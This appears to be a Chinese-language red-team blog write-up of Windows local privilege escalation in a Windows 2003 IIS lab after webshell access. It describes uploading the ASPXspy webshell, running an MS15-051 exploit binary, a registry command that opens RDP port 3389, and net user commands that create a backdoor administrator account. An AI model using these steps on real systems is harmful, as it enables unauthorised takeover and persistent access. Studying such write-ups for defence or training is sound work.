Windows 本地提權/滲透紀錄

 Windows 本地提權/滲透紀錄


作者 : Noth

前言 : 

對於紅隊一員來說,當拿到 Webshell 權限時遠遠還不夠,接下來必須要根據系統相對應的漏洞進行提權,筆者當初提權也搞不是很清楚,提權可以分成兩個部分來說,Windows、Linux 主機進行提權,這篇主要介紹的是 Windows 主機提權 ! 

實驗環境 : 

Windows 2003 

IIS Server  +  Aspx 

先前條件 : 

已經先拿到 Webshell,通過一句話連接或傳大馬(這邊使用ASPXspy)

實作流程 :

上傳ASPXspy後門到Server並訪問 


查看權限 cmdshell : 

whoami


找上傳點(目錄可執行) : 

C:\Windows\Temp

C:\windows\tasks

C:\windows\assembly

C:\RECYCLER\


上傳提權工具

ms15-051.exe :


 回到 CmdShell 執行命令查看是否提權(成功提權) :


查看開放端口 netstat -ano (沒有開放3389) :


創建一個 1.bat 檔案進行打開 3389 Port :

上傳到 C:\Windows\Temp 中去執行

內容 :  REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


再次查看 netstat -ano :

3389 port 成功開啟 


新建一個新用戶到管理組 :

net user admin$ 1qaz@WSX /add


net localgroup administrators admin$ /add 



 net localgroup administrators


然後遠程連接 : 


成功連接 :







留言

熱門文章